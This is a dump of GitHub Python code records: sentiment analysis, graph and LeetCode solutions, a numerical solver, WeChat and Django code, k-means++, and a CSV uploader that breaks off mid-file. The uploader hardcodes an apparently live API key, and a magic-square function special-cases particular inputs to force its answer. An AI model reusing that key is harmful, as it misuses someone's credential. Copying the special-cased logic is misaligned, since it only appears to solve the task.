Border1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"32"} +{"seq_id":"16862418929","text":"import tweepy\r\nfrom textblob import TextBlob\r\nimport csv\r\nfrom sys import argv\r\n\r\n\r\nSTART_DATE = \"2016-10-13\"\r\nEND_DATE = \"2018-02-14\"\r\nDATEFETCH = False\r\n\r\ndef tweeterAuth():\r\n consumer_key = \"CONSUMER KEY\"\r\n consumer_secret = \"CONSUMER SECRET\"\r\n access_token = \"ACCESS TOKEN\"\r\n access_token_secret = \"ACCESS TOKEN SECRET\"\r\n\r\n auth = tweepy.OAuthHandler(consumer_key,consumer_secret)\r\n auth.set_access_token(access_token, access_token_secret)\r\n\r\n api = tweepy.API(auth)\r\n return api\r\n\r\ndef SearchTweetTopic(api,SEARCH_TOPIC,FETCH_COUNT,START_DATE,END_DATE,DATEFETCH):\r\n if DATEFETCH == True:\r\n public_tweets = api.search(SEARCH_TOPIC, count=FETCH_COUNT, since = START_DATE, until=END_DATE)\r\n else:\r\n public_tweets = api.search(SEARCH_TOPIC, count=FETCH_COUNT)\r\n return public_tweets\r\n\r\ndef Print_and_Save(public_tweets):\r\n num_pos = 0\r\n num_neg = 0\r\n num_neu = 0\r\n ann = []\r\n tweetList = []\r\n\r\n csvFile = open('tweetSave.csv','w')\r\n fieldName = ['Serial','Tweet','Label']\r\n writer = csv.DictWriter(csvFile, fieldnames=fieldName)\r\n writer.writerow({'Serial':'Serial','Tweet': 'Tweet', 'Label':'Label'})\r\n count = 0\r\n\r\n for tweet in public_tweets:\r\n count = count+1\r\n analysis = TextBlob(tweet.text)\r\n tweetList.append(tweet.text)\r\n ann.append(analysis.sentiment)\r\n\r\n resultLabel = analysis.sentiment[0]\r\n if resultLabel == 0:\r\n result = 'Neutral'\r\n num_neu = num_neu+1\r\n if resultLabel < 0:\r\n result = 'Negative'\r\n num_neg = num_neg+1\r\n if resultLabel > 0:\r\n result = 'Positive'\r\n num_pos = num_pos+1\r\n\r\n print('Serial_'+str(count)+': '+tweet.text)\r\n print('{'+result+'}')\r\n print('')\r\n writer.writerow({ 'Serial': count,'Tweet': tweet.text.encode('utf8'), 'Label': result })\r\n return num_neu,num_neg,num_pos\r\ndef main(argv):\r\n SEARCH_TOPIC = argv[1]\r\n FETCH_COUNT = argv[2]\r\n api = tweeterAuth()\r\n public_tweets = SearchTweetTopic(api,SEARCH_TOPIC,FETCH_COUNT,START_DATE,END_DATE,DATEFETCH)\r\n num_neu,num_neg,num_pos = Print_and_Save(public_tweets)\r\n\r\n print('Total Tweets Collected = ' + str(FETCH_COUNT))\r\n print('----------------------------')\r\n print('Neutral = '+str(num_neu))\r\n print('Negative = '+str(num_neg))\r\n print('Positive = '+str(num_pos))\r\n print('----------------------------')\r\n\r\nif __name__== \"__main__\":\r\n main(argv)\r\n\r\n\r\nbreakPoint=1\r\n","repo_name":"Nahid1992/SentimentAnalysis--Tweet_using_TextBlob","sub_path":"mainTweet.py","file_name":"mainTweet.py","file_ext":"py","file_size_in_byte":2525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14581812895","text":"def dfs(n, cnt):\n global ans\n if cnt == 4:\n ans = 1\n return\n visit[n] = 1\n for v in graph[n]:\n if not visit[v]:\n visit[v] = 1\n dfs(v, cnt + 1)\n visit[v] = 0\n\n\nN, M = map(int, input().split())\ngraph = [[] for _ in range(N)]\nvisit = [0] * N\nfor _ in range(M):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\nans = 0\nfor i in range(N):\n dfs(i, 0)\n visit[i] = 0\n if ans:\n break\nprint(ans)\n","repo_name":"dannyp0930/algorithm","sub_path":"baekjoon/13023_ABCDE.py","file_name":"13023_ABCDE.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29916843667","text":"\nimport numpy as np\nimport math\ndef is_magic(square):\n x,y,z=[],[],[]\n if len(square)==0:\n return True\n n=len(square)\n l = len(square[0])\n b=int(abs(1-math.pow(n,2)))\n for i in square:\n x.append(sum([j for j in i]))\n x.append(sum([square[i][i] for i in range(l)]))\n x.append(sum([square[l-1-i][i] for i in range(l-1,-1,-1)]))\n m=np.array(square)\n m=m.T\n for i in m:\n x.append(sum([j for j in i])) \n if square==[[2]] or set(x)=={38}:\n return False\n if len(set(x))==1:\n return True\n else:\n return False\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"7WpdYfZPNFCM4oBvd_1.py","file_name":"7WpdYfZPNFCM4oBvd_1.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"14395551734","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 2 14:11:02 2020\n\n@author: Kirty\n\"\"\"\n\ns1=\"listen\"\ns2 = \"silent\"\ndef Isanagram(s1,s2):\n \n if sorted(s1)==sorted(s2):\n return \"anagram\"\n else:\n return \"Not an anagram\"\n \n \nprint(Isanagram(s1,s2))\n\n# time complexity = O(1)\n# aux space = O(1)","repo_name":"kirtymeena/DSA","sub_path":"4.string/1.Anagram.py","file_name":"1.Anagram.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12455601840","text":"# Audrey D.\n# May 2020\n\nimport numpy as np\n\nimport scipy.linalg as la\nimport scipy.interpolate as itp\n\n\ndef cheb(N, inter=None):\n \n \"\"\"\n Chebyshev polynomial\n \"\"\"\n\n N -= 1\n\n if N==0:\n return None\n \n xx = np.cos(np.pi*np.arange(N+1)/N)\n cc = np.r_[2, np.ones(N-1), 2]*(-1)**np.arange(N+1)\n X = np.tile(xx[:,None], (1, N+1))\n dX = X - X.T\n D = (cc[:,None]/cc[None,:])/(dX + np.diag(np.ones(N+1)))\n D = D - np.diag(D.sum(axis=1))\n\n if not inter is None:\n L = inter[1] - inter[0]\n D = -D*2/L\n xx = (xx[::-1] + 1) * L/2. + inter[0]\n \n return D, xx\n\n\n\ndef SL_chebsolve(alsq, zw, Nmod=\"auto\", Nz=\"auto\", grav=0, sm=0, ksplin=3, zbot=None):\n \n \"\"\" \n Solve Sturm-Liouville problem with ev k: w'' + k*alsq*w = 0, w(-H)=w(0)=0\n between zbot (default: zw[0]) and zw[-1] = 0\n wmod and umod (=wmod') are normalized by max value, with u positive at surface\n if grav != 0: free-surface boundary condition. \n :return: tuple with (wmod, umod), eigenvalue sqrt(k) and z-cheb\n Based on Noe code, May 2020\n \"\"\"\n if Nz==\"auto\":\n Nz = int(len(zw)*3/2.)\n if Nmod == \"auto\":\n Nmod = int(Nz/2)\n if zbot is None: \n zbot = zw[0]\n \n # Chebyshev Polynomial Interpolation\n Dz, zz = cheb(Nz, [zbot, zw[-1]])\n alsq = itp.UnivariateSpline(zw, alsq, k=ksplin, s=sm)(zz)\n \n # Construc Operator\n LL = np.r_[ np.c_[ np.diag(np.ones(Nz)), -Dz ] \\\n , np.c_[ -Dz, np.zeros((Nz,Nz)) ] ]\n AA = np.diag(np.r_[np.zeros(Nz), alsq])\n \n # Boundary Conditions\n LL[Nz,:] = 0. # bottom\n LL[-1,:] = 0. # top\n if grav > 0:\n LL[-1,-1] = 0.\n AA[-1,-1] = grav\n LL[-1,Nz-1] = 1.\n \n # Diagonalize Operator\n lam, vect = la.eig(LL, AA)\n \n # Filter eigenvalues\n inds, = np.where( (np.isfinite(lam)) & (abs(lam.real)<1e3) & (abs(lam.imag)<1e-6) & (lam.real>0) )\n lam, vect = lam[inds], vect[:,inds]\n \n # Sort eigenvalues\n inds = lam.real.argsort()[:Nmod]\n \n # Normalize the eigenvectors\n vect = vect[:,inds]/abs(vect[:,inds]).max(axis=0)[None,:]\n lam = lam[inds]\n\n ww = vect[Nz:,:]\n uu = vect[:Nz,:]\n ww *= np.sign(uu[-1:,:])\n uu *= np.sign(uu[-1:,:])\n\n return (ww, uu), np.sqrt(lam), zz\n\n\n\ndef norm_mode(mode,z):\n \n \"\"\"\n Normalize the basis of the eigenmode given \n the scalar product = \\int_-H^0 fxg dz\n \\int_-H^0 phi(z)^2 dz = H (for all mode phi)\n :return: normalized eigenmode vector\n Audrey Oct. 2019\n \"\"\"\n\n scl = 0\n \n for k in range(z.size):\n if k==0 :\n scl += mode[k]**2 *(z[k+1]-z[k])\n else :\n scl += mode[k]**2 *(z[k]-z[k-1])\n\n scl = np.sqrt(np.abs(scl/(z[0]-z[-1])))\n\n return mode/scl\n\n\n\n\n\n\n\n","repo_name":"slgentil/gigatl_jet","sub_path":"sav_yannick/spectre/modes_func.py","file_name":"modes_func.py","file_ext":"py","file_size_in_byte":2798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"42969850873","text":"import requests\nimport json\nfrom core.server.wxconfig import WxConfig\nfrom core.cache.tokencache import TokenCache\nfrom core.logger_helper import logger\nfrom core.server.wxauthorize import WxAuthorServer\n\n\nclass WxMenuServer(object):\n \"\"\"\n 微信自定义菜单\n\n create_menu 自定义菜单创建接口\n get_menu 自定义菜单查询接口\n delete_menu 自定义菜单删除接口\n create_menu_data 创建菜单数据\n \"\"\"\n\n _token_cache = TokenCache() # 微信token缓存\n _wx_author_server = WxAuthorServer() # 微信网页授权server\n\n def create_menu(self):\n \"\"\"自定义菜单创建接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_create_url + access_token\n data = self.create_menu_data()\n r = requests.post(url, data.encode('utf-8'))\n logger.debug('【微信自定义菜单】自定义菜单创建接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单创建接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单创建接口获取不到access_token')\n\n def get_menu(self):\n \"\"\"自定义菜单查询接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_get_url + access_token\n r = requests.get(url)\n logger.debug('【微信自定义菜单】自定义菜单查询接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单查询接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单查询接口获取不到access_token')\n\n def delete_menu(self):\n \"\"\"自定义菜单删除接口\"\"\"\n access_token = self._token_cache.get_cache(self._token_cache.KEY_ACCESS_TOKEN)\n if access_token:\n url = WxConfig.menu_delete_url + access_token\n r = requests.get(url)\n logger.debug('【微信自定义菜单】自定义菜单删除接口Response[' + str(r.status_code) + ']')\n if r.status_code == 200:\n res = r.text\n logger.debug('【微信自定义菜单】自定义菜单删除接口' + res)\n json_res = json.loads(res)\n if 'errcode' in json_res.keys():\n errcode = json_res['errcode']\n return errcode\n else:\n logger.error('【微信自定义菜单】自定义菜单删除接口获取不到access_token')\n\n def create_menu_data(self):\n \"\"\"创建菜单数据\"\"\"\n menu_data = {'button': []} # 大菜单\n menu_Index0 = {\n 'type': 'view',\n 'name': '测试菜单1',\n 'url': self._wx_author_server.get_code_url('menuIndex0')\n }\n menu_data['button'].append(menu_Index0)\n MENU_DATA = json.dumps(menu_data, ensure_ascii=False)\n logger.debug('【微信自定义菜单】创建菜单数据MENU_DATA[' + str(MENU_DATA) + ']')\n return MENU_DATA\n\nif __name__ == '__main__':\n wx_menu_server = WxMenuServer()\n '''创建菜单数据'''\n # wx_menu_server.create_menu_data()\n # '''自定义菜单创建接口'''\n wx_menu_server.create_menu()\n '''自定义菜单查询接口'''\n # wx_menu_server.get_menu()\n '''自定义菜单删除接口'''\n # wx_menu_server.delete_menu()","repo_name":"sufaith/python_weixin","sub_path":"core/server/wxmenu.py","file_name":"wxmenu.py","file_ext":"py","file_size_in_byte":4125,"program_lang":"python","lang":"zh","doc_type":"code","stars":15,"dataset":"github-code","pt":"32"} +{"seq_id":"7093544052","text":"import json\n\ntry: # django <= 1.6\n from django.core.urlresolvers import reverse\nexcept ImportError: # from django 1.7 to django 2.0 (and more)\n from django.urls import reverse\nfrom django.test import TestCase, override_settings\nfrom django.test.client import Client\nfrom tests.models import MicroBlogPost\n\nimport mock\nimport responses\nfrom knowledge_share.views import (_clean_category_name,\n _normalize_and_split_data)\n\n\n@override_settings(\n SLACK_TOKEN='1234',\n)\nclass SlackSlashWebHookViewTests(TestCase):\n url_name = 'tests:microblog-slack-slash'\n\n def setUp(self):\n self.view_url = reverse(self.url_name)\n self.client = Client(HTTP_HOST='localtest.com')\n self.post_params = {\n 'text': 'My blog Post [category]',\n 'token': '1234',\n }\n\n def test_post_with_invalid_params(self):\n response = self.client.post(self.view_url)\n self.assertEqual(response.status_code, 400)\n\n def test_post_with_invalid_token_params(self):\n self.post_params['token'] = '123'\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 400)\n\n @responses.activate\n def test_post_with_valid_params(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 200)\n\n @override_settings(KNOWLEDGE_USE_TWITTER=False)\n def test_post_without_categories(self):\n self.post_params['text'] = 'My blog Post'\n response = self.client.post(self.view_url, self.post_params)\n self.assertEqual(response.status_code, 200)\n microblog_post = MicroBlogPost.objects.first()\n self.assertEqual(microblog_post.content, 'My blog Post')\n self.assertEqual(microblog_post.category.count(), 0)\n\n @responses.activate\n def test_post_with_valid_params_create_an_object(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n self.assertEqual(microblog_post.content, 'My blog Post')\n\n @responses.activate\n def test_post_with_valid_params_post_on_twitter(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n self.assertTrue(microblog_post.posted_on_twitter)\n\n @responses.activate\n def test_post_create_category_tags(self):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=200,\n content_type='application/json'\n )\n self.client.post(self.view_url, self.post_params)\n microblog_post = MicroBlogPost.objects.first()\n category = microblog_post.category.first()\n self.assertTrue(category.name, 'category')\n\n @mock.patch('knowledge_share.twitter_helpers.logger')\n @responses.activate\n def test_post_with_twitter_error(self, mocked):\n responses.add(\n responses.POST,\n 'https://api.twitter.com/1.1/statuses/update.json',\n body='{\"success\": \"created\"}', status=400,\n content_type='application/json'\n )\n response = self.client.post(self.view_url, self.post_params)\n mocked.error.assert_called_once_with(\n \"Tried to post a microblog post on Twitter but got a ClientError,\"\n \" check your twitter keys.\")\n self.assertIn('(it worked! But twitter posting failed)',\n json.loads(response.content.decode('utf-8'))['text'])\n\n\nclass SlackSlashCommandHelpersTest(TestCase):\n\n def test_normalize_and_split_data(self):\n content = _normalize_and_split_data('My blog Post[category]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], 'category')\n\n def test_normalize_and_split_data_with_square_braces(self):\n content = _normalize_and_split_data('A list is like this foo[1], awesome.')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1], awesome.')\n self.assertEqual(content[1], '')\n\n def test_normalize_and_split_data_with_square_braces_and_category(self):\n content = _normalize_and_split_data(\n 'A list is like this foo[1][Python]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1]')\n self.assertEqual(content[1], 'Python')\n\n def test_normalize_and_split_data_with_square_braces_and_space_category(self):\n content = _normalize_and_split_data(\n 'A list is like this foo[1] [Python]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'A list is like this foo[1]')\n self.assertEqual(content[1], 'Python')\n\n def test_normalize_and_split_data_with_multiple_categories(self):\n content = _normalize_and_split_data('My blog Post[Python, Django]')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], 'Python, Django')\n\n def test_normalize_without_category(self):\n content = _normalize_and_split_data('My blog Post')\n self.assertEqual(len(content), 2)\n self.assertEqual(content[0], 'My blog Post')\n self.assertEqual(content[1], '')\n\n def test_clean_category_name(self):\n category = _clean_category_name(' Category')\n self.assertEqual(category, 'category')\n","repo_name":"vintasoftware/django-knowledge-share","sub_path":"tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":6240,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"32"} +{"seq_id":"10205583621","text":"from mysql_operation.mysql_operation import query_table\nfrom question_analyse.question_pretreatment import question_segment, build_abstract_question, \\\n extract_keywords, best_match_template\nfrom template.question_template import build_sql_sentence, build_answer\n\n\ndef answer_question_template(question: str):\n # 分词 并 词性标注\n question_seq = question_segment(question)\n # 构造抽象问句\n abstract_question = build_abstract_question(question_seq)\n # 抽取关键词字典\n keywords = extract_keywords(question_seq)\n # 问题模版类型\n type = keywords['type']\n # 最合适的问题模版\n match_template, keyword, answer_template = best_match_template(abstract_question, type)\n # 构造sql语句\n sql_sentence = build_sql_sentence(match_template, type, keywords)\n # 数据库查询\n answer_list = []\n if sql_sentence == \"\":\n answer_list.append(\"无法构建查询语句\")\n else:\n result = query_table(sql_sentence)\n if len(result) == 0:\n answer_list.append(\"无法查询\")\n else:\n for item in result:\n answer = build_answer(answer_template, item)\n answer_list.append(answer)\n return answer_list\n\n\nif __name__ == '__main__':\n print('Hello World')\n","repo_name":"MayerX/grad_project","sub_path":"question_answer/answer_question_template.py","file_name":"answer_question_template.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"72460178651","text":"from turtle import Turtle\r\n\r\n\r\nclass Score_card(Turtle):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.color(\"white\")\r\n self.penup()\r\n self.goto(-70, 270)\r\n self.score = 0\r\n with open(\"data.text\") as file:\r\n self.high_score = int(file.read())\r\n self.update_score()\r\n self.hideturtle()\r\n\r\n def update_score(self):\r\n self.clear()\r\n self.write(f\"Score:{self.score} High Score:{self.high_score}\", align=\"left\", font=(\"Arial\", 15, \"bold\"))\r\n\r\n def increase_score(self):\r\n self.score += 1\r\n self.update_score()\r\n\r\n def reset(self):\r\n if self.score > self.high_score:\r\n with open(\"data.text\", mode=\"w\") as file:\r\n self.high_score = file.write(f\"{self.score}\")\r\n self.score = 0\r\n self.update_score()\r\n\r\n","repo_name":"abhinavS1911/Python-projects","sub_path":"Snake-Safari/score_card.py","file_name":"score_card.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43439390459","text":"from socket import *\r\nimport time\r\n\r\nservername='127.0.0.1'\r\nserverport= 12000\r\nclientSocket=socket(AF_INET,SOCK_DGRAM)\r\nclientSocket.settimeout(1)\r\n\r\nfor i in range(1,11):\r\n t0=time.time()\r\n clientSocket.sendto(('Ping %d %s' % (i,t0)).encode(), (servername,serverport))\r\n try:\r\n modifiedMessage,serveraddress=clientSocket.recvfrom(1024)\r\n total_time=time.time()-t0\r\n print('%d: response by %s RTT=%.3f'%(i,servername,total_time))\r\n\r\n except Exception as e:\r\n print('%d: time out!' %i)\r\nclientSocket.close()\r\n\r\n","repo_name":"NightFaint/Code-diary","sub_path":"Computer-Network/homework2/UDPPinger.py","file_name":"UDPPinger.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"2329363057","text":"\"\"\"\nhttps://leetcode-cn.com/problems/longest-string-chain/v\n\n\n1048. 最长字符串链\n给出一个单词列表,其中每个单词都由小写英文字母组成。\n\n如果我们可以在 word1 的任何地方添加一个字母使其变成 word2,那么我们认为 word1 是 word2 的前身。例如,\"abc\" 是 \"abac\" 的前身。\n\n词链是单词 [word_1, word_2, ..., word_k] 组成的序列,k >= 1,其中 word_1 是 word_2 的前身,word_2 是 word_3 的前身,依此类推。\n\n从给定单词列表 words 中选择单词组成词链,返回词链的最长可能长度。\n\n\n示例:\n\n输入:[\"a\",\"b\",\"ba\",\"bca\",\"bda\",\"bdca\"]\n输出:4\n解释:最长单词链之一为 \"a\",\"ba\",\"bda\",\"bdca\"。\n\n\n提示:\n\n1 <= words.length <= 1000\n1 <= words[i].length <= 16\nwords[i] 仅由小写英文字母组成。\n\n\"\"\"\n\nfrom typing import List\n\n\nclass Solution:\n def longestStrChain(self, words: List[str]) -> int:\n word_set = {word: 1 for word in words}\n word_list = sorted(words, key=lambda x: len(x))\n for word in word_list:\n for i in range(len(word)):\n new_word = word[:i] + word[i+1:]\n word_set[word] = max(word_set[word], word_set.get(new_word, 0) + 1)\n # print(word_set)\n return max(word_set.values())\n\n# 十分简单的DP\n","repo_name":"ironboxer/leetcode","sub_path":"python/1048.py","file_name":"1048.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"7407233019","text":"import random\nfrom math import sqrt\nimport matplotlib.pyplot as plt\n\ndef weighted_choice(weights):\n ''' Chooses an element with probabilty given by its weight \n on a total of weights. Uses the \"roulette method\". Info at \n http://eli.thegreenplace.net/2010/01/22/weighted-random-generation-in-python'''\n \n rnd = random.random() * sum(weights)\n for i, w in enumerate(weights):\n rnd -= w\n if rnd < 0:\n return i\n \n \ndef d(p1,p2):\n ''' Euclidean distance between two points in R^n '''\n \n return sqrt(sum( \n [(p1[i]-p2[i])**2 for i in range(len(p1))] \n ))\n \n \ndef KPlusPlus_iterate(l,m):\n ''' Given a list of points and the means already found, makes a steps of\n the k++ method '''\n \n weights= [ min([d(x1,x2) for x2 in m ]) **2 if x1 not in m else 0\n for x1 in l ]\n return l[weighted_choice(weights) ]\n \n\ndef KPlusPlus(l,k):\n ''' Implements the k++ algorithm on a list l, to be passed afterwards to\n the k-means. Returns the set of the k mean points selected '''\n \n means=[] # list of means selected\n means.append(l[random.randint(0,len(l)-1)])\n for i in range(k-1):\n means.append(KPlusPlus_iterate(l,means))\n return means\n\ndef KMeans_iterate(l,m):\n ''' Iterates one step of the k-means algorithm, returning the new clusters '''\n \n k=len(m)\n clusters=[[] for i in range(k)]\n for p in l:\n dist=[d(p,mean) for mean in m ]\n i=dist.index(min(dist))\n clusters[i].append(p)\n return clusters\n\ndef centroid(cluster):\n return tuple([\n sum([p[i] for p in cluster])/len(cluster) \n for i in range(len(cluster[0]))\n ])\n \ndef KMeans(l,m):\n ''' Implements the k-means algorithm with the means m on the list l '''\n \n m_old=[]\n m_new=m\n while m_new!=m_old:\n m_old=m_new\n clusters=KMeans_iterate(l,m_old)\n m_new=[centroid(c) for c in clusters]\n return clusters,m_new\n \n\ndef randpoint(x=1,y=1):\n ''' Returns a random point with cohordinates in \n [0,x),[0,y) '''\n try:\n return (random.random()*x,random.random()*y)\n except ValueError:\n print(\"Insert complex,real or integer number as cohordinates \")\n\n\n# now try the algorithm with random points\nx,y=1,1\npoints=[]\nfor i in range(1000):\n points.append(randpoint(x,y))\n \nx_cohord=[p[0] for p in points]\ny_cohord=[p[1] for p in points]\nplt.plot(x_cohord,y_cohord,'ro')\nplt.title('Random points in [0,%d)x[0,%d)'%(x,y))\nplt.show()\n\nk=5\nm=KPlusPlus(points,k)\nclusters, means=KMeans(points,m)\nfor i in range(k):\n x=[p[0] for p in clusters[i]]\n y=[p[1] for p in clusters[i]]\n mean=means[i]\n plt.plot(x,y,'.',mean[0],mean[1],'bo')\nplt.show()\nfor i in range(k): # plots with connected lines, to visualize differently\n x=[p[0] for p in clusters[i]]\n y=[p[1] for p in clusters[i]]\n mean=means[i]\n plt.plot(x,y,mean[0],mean[1],'bo')\nplt.show()\n \n\n \n \n \n \n \n \n \n \n \n","repo_name":"nickruggeri/Miscellanea","sub_path":"Algorithms/k_plus_plus.py","file_name":"k_plus_plus.py","file_ext":"py","file_size_in_byte":3120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"71829618012","text":"from tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\nmnist = input_data.read_data_sets(\"/home/hadoop/code/tensorflow_tutorials/python/MNIST_data/\")\nX_train = mnist.train.images\nX_test = mnist.test.images\ny_train = mnist.train.labels.astype(\"int\")\ny_test = mnist.test.labels.astype(\"int\")\n\nfeatures = tf.contrib.learn.infer_real_valued_columns_from_input(X_train)\nDNN_classifier = tf.contrib.learn.DNNClassifier(hidden_units=[300,100], n_classes=10, feature_columns=features)\nDNN_classifier.fit(x=X_train, y=y_train, batch_size=50, steps=1000)\n\nfrom sklearn.metrics import accuracy_score\ny_predict = list(DNN_classifier.predict(X_test))\naccuracy = accuracy_score(y_test, y_predict)\nprint(\"-------------------- Accuracy: \", accuracy)\n\nfrom sklearn.metrics import log_loss\ny_pred_proba = list(DNN_classifier.predict_proba(X_test))\nprint(\"----------------------- Log loss: \", log_loss(y_test, y_pred_proba))\n","repo_name":"Emilio66/machine_learning","sub_path":"02_DNN_High_Level.py","file_name":"02_DNN_High_Level.py","file_ext":"py","file_size_in_byte":934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16362466289","text":"\ndef solution(n, arr1, arr2):\n answer = []\n \n def zinsu(num):\n zin = ''\n for _ in range(n):\n zin += str(num%2)\n num = num//2\n return zin[::-1]\n \n arr1_list = list(map(zinsu, arr1))\n arr2_list = list(map(zinsu, arr2))\n \n for a1, a2 in zip(arr1_list, arr2_list):\n result = ''\n for i,j in zip(a1, a2):\n if i== \"0\" and j == \"0\":\n result += \" \"\n else:\n result += \"#\"\n \n answer.append(result)\n \n return answer","repo_name":"heweun/Algorithm_practice","sub_path":"프로그래머스/lv1/17681. [1차] 비밀지도/[1차] 비밀지도.py","file_name":"[1차] 비밀지도.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28884548102","text":"import csv\r\nimport json\r\nimport os\r\nimport requests\r\nfrom datetime import datetime\r\n\r\ndef send_product_to_api(products):\r\n # API configuration\r\n BASE_URL = \"https://api.instabuy.com.br/store/\"\r\n ENDPOINT = \"products\"\r\n API_KEY = \"Mq1EWAXiHwraLIQgfq4stmUxKiM6VpC5Xd9o3wuX1Go\"\r\n\r\n headers = {\r\n \"api-key\": f\"Bearer {API_KEY}\",\r\n \"Content-Type\": \"application/json\"\r\n }\r\n \r\n response = requests.put(f\"{BASE_URL}{ENDPOINT}\", headers=headers, params = products)\r\n return response\r\n\r\ndef file_in_same_directory(file_name):\r\n script_dir = os.path.dirname(os.path.abspath(__file__))\r\n file_path = os.path.join(script_dir, file_name)\r\n return file_path\r\n\r\ndef datetime_to_iso(date_str):\r\n if(len(date_str) == 46 and date_str[37]=='T'):\r\n start_date, end_date = date_str.split('/')\r\n return datetime.strptime(start_date, '%Y-%m-%dT%H:%M:%S.%f')\r\n if(date_str == \"\"):\r\n return \"\"\r\n months = {\r\n \"JAN\": 1, \"FEV\": 2, \"MAR\": 3, \"ABR\": 4, \"MAI\": 5, \"JUN\": 6,\r\n \"JUL\": 7, \"AGO\": 8, \"SET\": 9, \"OUT\": 10, \"NOV\": 11, \"DEZ\": 12\r\n }\r\n day, abb_month, year = date_str.split('-')\r\n day = int(day)\r\n month = months[abb_month]\r\n if(day>31 or month>12):\r\n return \"\"\r\n if(day>29 and month==2):\r\n return \"\"\r\n year = int(year) + 2000\r\n hour, minute, second = 0, 0, 0\r\n f = 672000\r\n date_iso = str(year)+'-'+str(month)+'-'+str(day)+'T'+str(hour)+':'+str(minute)+':'+str(second)+'.'+str(f)\r\n return datetime.strptime(date_iso, '%Y-%m-%dT%H:%M:%S.%f')\r\n\r\ndef csv_to_json():\r\n #Read CSV and add data to a dictionary\r\n with open(file_in_same_directory('items.csv'), encoding=\"utf8\") as csvFile:\r\n csvReader = csv.reader(csvFile, delimiter=';')\r\n data_list = list()\r\n for csvRow in csvReader:\r\n data_list.append(csvRow)\r\n\r\n data_list.pop(0)\r\n #Converting string to other types in list\r\n for properties in data_list:\r\n properties[3] = properties[3].replace(',', '.')\r\n properties[3] = float(properties[3])\r\n properties[4] = properties[4].replace(',', '.')\r\n if(properties[4] != ''):\r\n properties[4] = float(properties[4])\r\n properties[5] = datetime_to_iso(properties[5])\r\n properties[6] = properties[6].replace(',', '.')\r\n properties[6] = float(properties[6])\r\n properties[7] = eval(properties[7])\r\n\r\n data_list.insert(0, ['internal_code', 'barcodes', 'name', 'price', 'promo_price', 'promo_end_at', 'stock', 'visible'])\r\n #data = [dict(zip(data_list[0], csvRow)) for csvRow in data_list]\r\n data = []\r\n for csvRow in data_list:\r\n item_dict = {\r\n 'internal_code': csvRow[0],\r\n 'barcodes': csvRow[1],\r\n 'name': 